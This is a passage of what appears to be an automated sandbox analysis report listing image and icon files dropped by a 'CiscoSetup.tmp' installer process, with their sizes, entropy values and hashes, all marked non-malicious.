                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):417
                                                                                                                                      Entropy (8bit):7.261808950496785
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7ye/67M2KK09AtPNFPQM7vcvei4A62GCv+OQRWqxEz:de/YM2KYBTcKA62VWvE
                                                                                                                                      MD5:E49813F0A990FD98318710C0F0BFDA21
                                                                                                                                      SHA1:FD09D47A8BA649393221D5048D3BFF1FFADD3496
                                                                                                                                      SHA-256:79C957FB0133496B0266E8F5441982D3F1DAB781B90FBC34F59D75968577CD61
                                                                                                                                      SHA-512:8883387871CBE8B3778F5D95A95700D99B7D4737696051436C06060C645F83E25255A76AA73CD5BA1B03FC5797D8F6B99D1B0E489B5421D26D4E7DBFD358EA65
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12068
                                                                                                                                      Entropy (8bit):7.961027992023309
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                      MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                      SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                      SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                      SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):478
                                                                                                                                      Entropy (8bit):7.3703130572324955
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7xE0NSVUvFAccOOfACD09VvVupRqR5/MXMmxHlWX:YY+vFr+cvV8w3MXMm+
                                                                                                                                      MD5:D3BD002D9E657FC264347FE2FE45EE8D
                                                                                                                                      SHA1:8EC6528F2E8A07036C5D5F439FA0438C99CE814E
                                                                                                                                      SHA-256:B17D8F8BC1B971962A798743630816DFEF50526A2692BB458A7B1B6A546D28B0
                                                                                                                                      SHA-512:3BF535A63BCE729ABD443CA4265147DB46DFF698BC2AA27C7FFE430527F7C4FD921AFFBD6E789BC00EAC4DFFE300E82488A8C4886DC9D629DCA6B5CF905C0624
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0422788649872297
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:xh4r3rEO9SEEEEEEEEE2888888888Bsff:xKfgH
                                                                                                                                      MD5:B4FE215E5858B187A041DEABB2E1CB04
                                                                                                                                      SHA1:E8F16887E8BFFF243EB1AEAAF21B382CD0DFD9EE
                                                                                                                                      SHA-256:9FC38B41A0D11FF64348F0E125692091D478E6E4F1C368A4E01863D49F87BB87
                                                                                                                                      SHA-512:371FEA20A067929B21543490CE56C370BE8477B40630D2EE0BA613FE91A485D083DCB0FE4B0E76465576935F0311CC65832B48B3487F5C2B83ABB4E8B9AB4270
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388
                                                                                                                                      Entropy (8bit):7.139959170245274
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7Hel//IgFAkq3Dhp5tRX3Sq+IeSzgKOg6p2e:aehvFXSELAgKja2e
                                                                                                                                      MD5:34C2847A763607A881B1E9A81CA9A4DC
                                                                                                                                      SHA1:B6050C2A1AA45C78F273B76FB729158E0F172D18
                                                                                                                                      SHA-256:4D735FCC94C53B0753F49E2656EE480D37F4899520F17C48FF7D1F0DDC2A9A8C
                                                                                                                                      SHA-512:8E3C4C1F62BDF79B2C5263D0C4DD97E302261A0C5C9399C13FADD3E25301F7DDA7297ECE3A8352534C9DA4B3A23FFE497FD61BDA348D14BB6658AF2C66863727
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12436
                                                                                                                                      Entropy (8bit):7.977312501768235
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:9duiLviw1Tg2WOFeuMhEhKPewOSJKVBpFGo5cJUs1P3X3cI78saDjy6Z7KiasZM1:7vJ0OYhbPWEKLaoe9dXsI789HZTla
                                                                                                                                      MD5:3F1083A6458C2CC3E9743D03ACB0D349
                                                                                                                                      SHA1:280DA65E961DAC251D6394A234E92FB110DBC998
                                                                                                                                      SHA-256:78A87D7B4CDA2E04CF4A608C78CE627450E15CD75AE121B4D72466837197D096
                                                                                                                                      SHA-512:250604CE42BD866B870A50B01E892036364DBBBEA1AC58EF60B3E4E38513A9DADE3987459FBD83681435D74521B368550DFE329E70CDD84837BAFCD2E43B53A2
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1264
                                                                                                                                      Entropy (8bit):7.787798189239225
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GblEbksH883ZKHGbOgt1NxI7aY1nigCC2OjKe6Yt3CvPTWngq2i3sTj85:ElEJH8I/NkQgQ+KtY1C3Sngq2VW
                                                                                                                                      MD5:DB2D5090354734EC085D88810B342866
                                                                                                                                      SHA1:F727BC14361A4332C73BFB5194CA5FF6EAC37959
                                                                                                                                      SHA-256:996C1A034CC8B6CA3C511E2C7EE2FED22F31904DB769A1AD8555F1CFD478AA62
                                                                                                                                      SHA-512:04F9B9B5EABD33E318F6A83A734ECA67C2778745560F44F45C535847BF642B33DB2C6C974CC7A6AAE4C68C67470135B15ABB2A77247BFF3C518EC113FDFD8888
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):431993
                                                                                                                                      Entropy (8bit):4.565786626694248
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:qG481XVja/lkbbVYHd6saT3N2z00cAXoKM0Baf0I:qC3a/lkbbaHd6saT3QZnXdBZI
                                                                                                                                      MD5:A6441E0D126BDAEB1308C9B4EB5D30D7
                                                                                                                                      SHA1:07206E99763B97507D5D7BCB3DF221F48ABF60FF
                                                                                                                                      SHA-256:5A624CBE0242B49FE13104345760BD16F6B2D50F1AC9FB19B92F76BDBBED938A
                                                                                                                                      SHA-512:DC85660518234A581F3EA19FB5892F53B1BA3671293F5BB886AD63D91CCEA0AC31E55ECEA528487AF1BC343CF226E268CF50B4903D67430919FD9B715889EB7B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29723
                                                                                                                                      Entropy (8bit):7.971507308971378
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:f/oVoAjsba3qfpgr/jKyV8xonTTdZPNE/ZIeb4p82Xg:fwZ6tyHTTdERbkp8Mg
                                                                                                                                      MD5:DDF9FC987801BDE753D2C37733DE7F3D
                                                                                                                                      SHA1:BDA65E600F5EDD2889244E2C1CEAD37C1C292FC8
                                                                                                                                      SHA-256:D62A61171CAAD9B43DBCE2683DB87959B2C1FCB303D6B34A3DC1D178A9745F44
                                                                                                                                      SHA-512:D1C0451C3E9B52920A56EDF57CCF3617662E18B14E0E0B00A94D948574431C30E1C31BA2FF6F4BBFA8E01D42B00EA90FD03CD1D3991B3ACF04C5C9802F547244
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3880
                                                                                                                                      Entropy (8bit):6.742220289284142
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcr:iXHt+JcNgOSiS4XsAYNpf2ESNVr
                                                                                                                                      MD5:3C512CF63246231506E533D6800FF3EB
                                                                                                                                      SHA1:CF02F3D7AD80DC48B900464D1F8D828F44213443
                                                                                                                                      SHA-256:C211B550E4DF39BDD1E7A39E7979EBFEAB155BDAEF2498A09D63B45713C30768
                                                                                                                                      SHA-512:ECE459102971594D5EB348FF9AA16E5EC0E7222594D63096289B566B07D020B534947D231E6C3CA1E139F407B9A5251933CF38C7BCEDAE693741499A9108D9D6
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83111
                                                                                                                                      Entropy (8bit):7.138058183615623
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:VC5Kuc25xWuSyREGUa7eZoQZBrMd+Wdl6P1NsDO1U:VC5Dx8yRTeBZW4k9DOu
                                                                                                                                      MD5:E9352AD002DC71C84B605700A6684C46
                                                                                                                                      SHA1:312487A0D0778CB57EBC0B5ABBA29CB6C31187FA
                                                                                                                                      SHA-256:55E9F9561425D5B5994506DB5932FF3C87ACAD729BB4CC043EE99EFB85484E0A
                                                                                                                                      SHA-512:CAC779DCB625BF8C8736686407BB81DB140434FB16DC98144E113F2822AB3A907A7E7CA63751D73604B11EF0F0DFCB6979833DE75B160542CF7C969F39533867
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12780
                                                                                                                                      Entropy (8bit):7.975972884511595
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:eS01CYt7F9/5i2XPFK02VBVDNP/RqOMGkw9j:e1th95PqjP/E1A
                                                                                                                                      MD5:1CE2626120CD6B69683255C71552896B
                                                                                                                                      SHA1:4230DF12A00E6B13CAB39EFB1C44DCBF5B656087
                                                                                                                                      SHA-256:B55ABBF6754B131C33947DCA3511D219B2AB2DC5D7E8945BF3C6A2E9FB0FEB23
                                                                                                                                      SHA-512:A197A76FB7DB9FEF68E3A49DE4C134EFB41472773F323BF4F8AB3B610174FD75C15848BB42CFC2D4240D72EFA66FF4CFFE02DDA28323279C87C7019E167F724B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.010961844615086
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:+9/hYGSEklnePwwDIr4LcARtTmOj/FrzFkT7goo:+9/CGShEPJcX87v
                                                                                                                                      MD5:393317DEF43F554C69A8ED63065E5BBE
                                                                                                                                      SHA1:09185B8B3C21C5CFB6661958665B6D997BF64E6F
                                                                                                                                      SHA-256:92ACFDA492B05FAA52BD32E9581F028BEE55F1C5AF617ACD8EE9E6985C9D1CBD
                                                                                                                                      SHA-512:9C7B0D37DA9080F27F0116F0C45AA5CD2D9480955433D60CCEE1555C0D930081655705C65565C7C18B766458530FA5B8DD641E7D2F8776BBB8650B7D3A95351C
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10239
                                                                                                                                      Entropy (8bit):7.950564187811269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uTeKIu+Nxu1/eEefaoIgGSw78i5GJssnezz3Gu5cMrvF6AO:uTeg+NkdeCodGSiV3dcI96AO
                                                                                                                                      MD5:7DADB01AC22B7AB6F313726AD5977675
                                                                                                                                      SHA1:274554CDEB3971D3A9250AA0A7597F8B41D17000
                                                                                                                                      SHA-256:EBBA9313774314E18ABB4F4342B1C0C93DF22DD45146C6E84A08EB39BD419825
                                                                                                                                      SHA-512:C77FA7F8791A4852DBA2C9402D705E6C4CDB92DAAF71CD5F46EA8AD6EA35E41D4CFF42296C2F08133A82AE1F31DCA05C61B29AC291F85BBE4C7FDF088A4F0866
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5558
                                                                                                                                      Entropy (8bit):4.450533821817726
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:vcn7ngbW2IU8R9Lq+LhfSnuX31xEqxpkg:E74IU8R9LqMTFxz
                                                                                                                                      MD5:EAF0F00DA8BB1D384B8A5BB3B82D0A54
                                                                                                                                      SHA1:2E7021D20D962F4568A51757B2D9B7408624740E
                                                                                                                                      SHA-256:86D5102E01D6D29D5AEE6E87E827B8C624D7B552035C9AFDB0BE2B120E4A553F
                                                                                                                                      SHA-512:57358DEA1B8A75A8FEEE29F9D83931D65672B228B93CE6C9CFEEBA3C77FD9FDB8D7B7D4A1F3188D8CBC2FEBF8B427F574791E6210580499788FF101641C01854
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1856
                                                                                                                                      Entropy (8bit):7.845521158056495
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:M5K2A2T3d0z5uOpdNSaQfbDS3YsPWaU3SjmUjm42rh:Mg2A9z5Fp1W3otPW5p
                                                                                                                                      MD5:AFAF04A11862845AFC31D64F7762D28E
                                                                                                                                      SHA1:C5E99C3DC321086738CB7BCF13EFF55EBDF1D3CF
                                                                                                                                      SHA-256:6797601AA69F2B489ADAB85A6DA73E78D4E041D24598BC726A3E837D2BE2D75E
                                                                                                                                      SHA-512:3D463D3EA19E87E8B592974BF4B69F4F6F5DE08975BB04AB0C180AE7CC49C9866E7B40F2D5890E50E7BF0FE2F8830125335FECB7C4FED8F2AF6045F8E66E18B4
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26674
                                                                                                                                      Entropy (8bit):7.935979285003627
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:YFyemvD4Gm3D6kkgmo+C24RkZErZWiTVCbFk:YryD4G+Dcgmo+C9kZsZWpFk
                                                                                                                                      MD5:B1655EC01B232A1A42E43F950321285A
                                                                                                                                      SHA1:F34C1F228C66BF4ED1B0E9901D3284EBD7A01600
                                                                                                                                      SHA-256:9E2447F1B7B4A3404C8D3588DAB59CF51635049BE4F1FC0D1BDEE77DEFFC5B47
                                                                                                                                      SHA-512:BCC1BC2AE795109EF83422613D9B0D9FF23EA81136479748FFA7CD7FC03D527B4744833728637F7892B5F60DD476F1F32122AECCCC26DB2D6092CD2346A750BA
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9736
                                                                                                                                      Entropy (8bit):7.95835565935799
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                      MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                      SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                      SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                      SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11585
                                                                                                                                      Entropy (8bit):7.961332304899258
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uoknxnFWLkyZS1HwgrTfSTVQV1r+2HPOSm9HRNxe6S1ipOvyYh95kRwjtbul4Ljh:uo4xAoKoHuVuHPOSmdfxy1ipwN5bjtbB
                                                                                                                                      MD5:FAA694AA17D61EAC6803E15397AE2C15
                                                                                                                                      SHA1:D3FBA06AA2794D460DEF2997E84EC7CBE49A83AB
                                                                                                                                      SHA-256:9AC4F60BF1A10CD08529427AAA1C419F5C4C1412D23EE5764B9EDACC3558A980
                                                                                                                                      SHA-512:5B2586AC90E5366C236AE02181172842CFDC311495157477ACB388A50CA56B5FB1EE532B753323566937012A54027DC53DE803DB4178F6F85618ADA4B015308C
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2274
                                                                                                                                      Entropy (8bit):7.88487369762579
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                      MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                      SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                      SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                      SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28939
                                                                                                                                      Entropy (8bit):7.960017526195935
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:OkJC2FKvbdu0G3091/3+WVlQkJyE3MNLc37Wr65:FCQmc0390W0kT8ll8
                                                                                                                                      MD5:B52EAA7318111371B2B8EF3425AD4405
                                                                                                                                      SHA1:DB16F9570B55F8045FE8354ACC853655791557AA
                                                                                                                                      SHA-256:C33C036B94E3BD83D393E552CE87784BA9F74D2B8563162024DAF7ED05E7EF6D
                                                                                                                                      SHA-512:AA98F3130A76BCD5FAF093886472F1A937E93AD0A8E83C00F9675C14C7AFC5DF903C52DE64FBAD6012F5DF54A1DB56759481BA8516C0DB0A851B6BE87FD13DFF
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):700
                                                                                                                                      Entropy (8bit):6.305816801627044
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7B0J+UJbp92cDPuY1qHlnv/pebLaeb9Lf43DQ6TjpuIXG13DQ6i5t2c:0erLYWuqylnv/pe3aO9KDUIXO3D+/
                                                                                                                                      MD5:894AB8F4298F2238292E31BAB5CCAB10
                                                                                                                                      SHA1:FCFC29B4E5BAC3C59EDA1F8837087E768F7B0A7B
                                                                                                                                      SHA-256:7C8B5EC8C7DE5405AAEE5B1E92C605020424AED8AF830C2429ED47883561A39D
                                                                                                                                      SHA-512:B7F06E961C2C2BAC0EFC5633E213D90E3206093593988BD04CE84DA13B1D1B4F0B83DEB77FF247E6681A645004FD37C2866FF83EB7A6A5E3E581B0868AB58C3E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):75452
                                                                                                                                      Entropy (8bit):6.447447333863436
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:i6ORO3YabolewEiM0aJqCrvbURQDEb6b/4:ik3dolewM0agCrImD3w
                                                                                                                                      MD5:9C6F8BF269230734B04A82F610B9B912
                                                                                                                                      SHA1:2B81B2C45C94CA29330ED0223F21928BEAA66A3D
                                                                                                                                      SHA-256:3A5C49B91E68BE97E158E7A35C54996C45F1E9E8432927AF476D5F85BCF7B67E
                                                                                                                                      SHA-512:4F24CAD91616F50E1C28E0D44C66B0F6E6C89F38E9A07B81C43810862F3E76E77D897D6B06BB7CD2FEFDFC1E01011FA1CEBCDF2E6E53F347E98B9CEF7FCBF1C9
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10239
                                                                                                                                      Entropy (8bit):7.950564187811269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uTeKIu+Nxu1/eEefaoIgGSw78i5GJssnezz3Gu5cMrvF6AO:uTeg+NkdeCodGSiV3dcI96AO
                                                                                                                                      MD5:7DADB01AC22B7AB6F313726AD5977675
                                                                                                                                      SHA1:274554CDEB3971D3A9250AA0A7597F8B41D17000
                                                                                                                                      SHA-256:EBBA9313774314E18ABB4F4342B1C0C93DF22DD45146C6E84A08EB39BD419825
                                                                                                                                      SHA-512:C77FA7F8791A4852DBA2C9402D705E6C4CDB92DAAF71CD5F46EA8AD6EA35E41D4CFF42296C2F08133A82AE1F31DCA05C61B29AC291F85BBE4C7FDF088A4F0866
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2274
                                                                                                                                      Entropy (8bit):7.88487369762579
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                      MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                      SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                      SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                      SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):291
                                                                                                                                      Entropy (8bit):6.344520469543007
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                      MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                      SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                      SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                      SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............}\.....gAMA......a.....pHYs...........~.....tIME........w.e....tEXtComment.Created with GIMPW.......tEXtSoftware.Paint.NET v3.5.100.r....gIDATHKc`...!@........0.a|Rh..r....0E0>)4.}=..t.....0W....x}......a.`|R...dTw..........B.u..-.z...8.C..^...Y.......IEND.B`.
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.020486157649533
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNAG+ojoyMmcI1VYj41jCw1jaPl3VYjJoUHH3yG3:g/6G6GknA9Wg2O0y/c0CKum23CuUHiWV
                                                                                                                                      MD5:F999F81B91475C98DE33D66E186DF2CA
                                                                                                                                      SHA1:397B889C5AA95A25FFBD128656BE5D91A71F3275
                                                                                                                                      SHA-256:F807E26DA3A4BBFBD9552D2D50FB0F5FC28AAC46635470E3F834C2042C05310B
                                                                                                                                      SHA-512:2A43CB4EFC414F8FAE4EA173FB53CF2819975C76170DCEE4A995B3A74786C167C26DF258E1E589ECD92DECB999683EA38C6C4882CC2E299313C9357080521844
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T17:58:51-04:00" xmp:MetadataDate="2018-10-19T17:58:51-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c57f0649-d423-40eb-938e-eeff8347c1a5" xmpMM:DocumentID="xmp.did:c57f0649-d423-40eb-938e-eeff8347c1a5"
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.01754566314674
